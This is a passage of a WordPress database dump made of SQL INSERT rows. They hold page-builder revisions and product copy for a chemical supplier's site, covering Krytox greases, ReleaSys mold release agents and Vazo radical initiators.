text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 13:30:39', '2016-09-13 13:30:39', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1594, 3, '2016-09-13 13:31:26', '2016-09-13 13:31:26', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<h2>SINCE 1955</h2>\r\n[/text_box]\r\n[text_box position_y="15"]\r\n\r\n<em>Quality &amp; Service</em>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n[col span="4"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\r\n[divider]\r\n<h1>ReleaSys<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1253" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1249" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1578"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 13:31:26', '2016-09-13 13:31:26', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1595, 3, '2016-09-13 13:38:56', '2016-09-13 13:38:56', '[row]\n\n[col span="6"]\n\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\n\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" text_align="left"]\n\n[title style="bold" text="Semi-Permanent Mold Release"]\n\n<h1>ReleaSys</h1>\n<p>Miller-Stephenson<br /> Exclusive Product</p>\n<p><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="6"]\n\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\n<p>Miller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:</p>\n<ul>\n<li>Cost-Effective, Efficient Release</li>\n<li>Lower rejection rates and Higher quality parts</li>\n<li>Superior Durability and Surface Adhesion</li>\n<li>Low Levels of Mold Fouling</li>\n<li>Minimized transfer</li>\n</ul>\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\n\n\n[/col]\n\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-09-13 13:38:56', '2016-09-13 13:38:56', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1596, 3, '2016-09-13 13:40:01', '2016-09-13 13:40:01', '[row]\n\n[col span="6"]\n\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\n\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" text_align="left"]\n\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\n\n<h1>ReleaSys</h1>\n<p>Miller-Stephenson<br /> Exclusive Product</p>\n<p><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="6"]\n\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\n<p>Miller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:</p>\n<ul>\n<li>Cost-Effective, Efficient Release</li>\n<li>Lower rejection rates and Higher quality parts</li>\n<li>Superior Durability and Surface Adhesion</li>\n<li>Low Levels of Mold Fouling</li>\n<li>Minimized transfer</li>\n</ul>\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\n\n\n[/col]\n\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-09-13 13:40:01', '2016-09-13 13:40:01', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1597, 2, '2016-09-13 13:45:17', '2016-09-13 13:45:17', '', '283AZ', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\n<br /><br />\nKrytox 280 Series contain 1% sodium nitrite whereas Krytox 283 Series contain 5% sodium nitrite.', 'inherit', 'closed', 'closed', '', '652-autosave-v1', '', '', '2016-09-13 13:45:17', '2016-09-13 13:45:17', '', 652, 'https://132.148.10.86/wordpress/652-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1598, 3, '2016-09-13 13:50:46', '2016-09-13 13:50:46', '[row]\n\n[col span="6"]\n\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\n\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\n\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\n\n<h1><strong>ReleaSys</strong></h1>\n<p><strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="6"]\n\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\n<p>Miller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:</p>\n<ul>\n<li>Cost-Effective, Efficient Release</li>\n<li>Lower rejection rates and Higher quality parts</li>\n<li>Superior Durability and Surface Adhesion</li>\n<li>Low Levels of Mold Fouling</li>\n<li>Minimized transfer</li>\n</ul>\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\n\n\n[/col]\n\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-09-13 13:50:46', '2016-09-13 13:50:46', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1599, 2, '2016-10-05 18:00:15', '2016-10-05 18:00:15', 'Krytox XHT-BD series oils are special extreme high temperature greases with low oil evaporation that are thickened with a non-melting thickener to allow use at temperatures above the melting point of common greases. They have excellent lubrication over a broad temperature range. Krytox XHT-BD series greases are nonflammable and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\n\nKrytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox XHT-BD greases are for use in low speed bearings or in pillow housings and will shear at high speeds, causing loss of oil in sealed bearings. The oil in the grease can begin to slowly evaporate at temperatures above 330 °C (626 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life.\n\n<strong>Compatibility with Metals</strong>\nDue to their low surface tensions, Krytox oils easily wet metallic surfaces; and, because of their inertness, Krytox oils have little or no adverse effect on metals. Testing of metals at 340 °C (644 °F) in the absence of air has shown little evidence of corrosion. In the presence of air, corrosion was slightly higher. The presence of molybdenum in the metals improved corrosion resistance.\n\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.', 'XHT-BD', 'Krytox XHT-BD greases are designed for use where the temperatures are in the 288 °C (500 °F) range and higher, where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener.\n<br /><br />\nLowest viscosity grease in the XHT-BD Series.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '675-autosave-v1', '', '', '2016-10-05 18:00:15', '2016-10-05 18:00:15', '', 675, 'https://132.148.10.86/wordpress/675-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1600, 3, '2016-09-13 15:05:41', '2016-09-13 15:05:41', '', 'VAZO 64 radical initiator AIBN', '', 'inherit', 'open', 'closed', '', 'vazo-64-2', '', '', '2016-11-24 03:50:57', '2016-11-24 03:50:57', '', 427, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-64-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1601, 3, '2016-09-13 16:02:07', '2016-09-13 16:02:07', '<a href="https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/">Vazo FRS</a> (Vazo free radical initiator ) is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as free radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas. Vazo free radical initiators are cost-effective, efficient polymerization initiators and radical halogenation agents.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo FRS compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the compounds,<a href="https://www.miller-stephenson.com/product/vazo-64-radical-initiator/"> Vazo 64</a> (AIBN) has a 10hr half-life at 64 degrees Celsius, while <a href="https://www.miller-stephenson.com/product/vazo-88-radical-initiator/">Vazo 88</a> has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo free radical initiator variant will work for their synthetic pathway, the number associated each FRS analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, FRS initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS ( Vazo free radical initiator ) is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.\r\n\r\nTo learn more about Radical Polymerization please go to: <a href="https://en.wikipedia.org/wiki/Radical_polymerization">https://en.wikipedia.org/wiki/Radical_polymerization</a>', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'publish', 'closed', 'closed', '', 'vazo-free-radical-initiator', '', '', '2017-06-05 19:42:39', '2017-06-05 19:42:39', '', 0, 'https://132.148.10.86/wordpress/?p=1601', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (1602, 3, '2016-09-13 15:14:13', '2016-09-13 15:14:13', '', 'initiation_-_photolysis', '', 'inherit', 'open', 'closed', '', 'initiation_-_photolysis', '', '', '2016-09-13 15:14:13', '2016-09-13 15:14:13', '', 1601, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Initiation_-_photolysis.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (1603, 3, '2016-09-13 16:02:07', '2016-09-13 16:02:07', 'Vazo FRS is a product line of diazo-compounds designed to be used as radical initiators for a varied of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals than a variant with a higher thermal decomposition temperature.  For the Vazo compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, Vazo 88 has a 10hr half-life at 88 degrees Celsius and so on.  For ease in our customers to distinguish which', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-09-13 16:02:07', '2016-09-13 16:02:07', '', 1601, 'https://132.148.10.86/wordpress/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1604, 3, '2016-11-24 20:40:19', '2016-11-24 20:40:19', '<a href="https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/">Vazo FRS</a> (Vazo free radical initiator ) is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as free radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas. Vazo free radical initiators are cost-effective, efficient polymerization initiators and radical halogenation agents.\n\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\n\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo FRS compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the compounds,<a href="https://www.miller-stephenson.com/product/vazo-64-radical-initiator/"> Vazo 64</a> (AIBN) has a 10hr half-life at 64 degrees Celsius, while <a href="https://www.miller-stephenson.com/product/vazo-88-radical-initiator/">Vazo 88</a> has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each FRS analogue indicates its 10hr half-life at that temperature.\n\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, FRS initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\n\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\n\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.\n\nTo learn more about Radical Polymerization please go to: <a href="https://en.wikipedia.org/wiki/Radical_polymerization">https://en.wikipedia.org/wiki/Radical_polymerization</a>', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-autosave-v1', '', '', '2016-11-24 20:40:19', '2016-11-24 20:40:19', '', 1601, 'https://132.148.10.86/wordpress/1601-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1605, 1, '2016-09-13 16:49:51', '2016-09-13 16:49:51', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font"><em>INTRODUCING</em></h4>\n[divider]\n\n<h1>ReleaSys<strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1578"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 16:49:51', '2016-09-13 16:49:51', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1606, 3, '2016-09-13 16:52:12', '2016-09-13 16:52:12', '', 'Vazo Free Radical Initiator', '', 'inherit', 'open', 'closed', '', 'vazo-frs-article', '', '', '2016-11-24 20:37:47', '2016-11-24 20:37:47', '', 1601, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/VAZO-FRS-article.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1607, 3, '2016-09-13 16:52:36', '2016-09-13 16:52:36', '<img class="alignnone  wp-image-1606" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/VAZO-FRS-article-800x533.jpg" alt="vazo-frs-article" width="732" height="488" />\r\n\r\nVazo FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the Vazo compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, while Vazo 88 has a 10hr 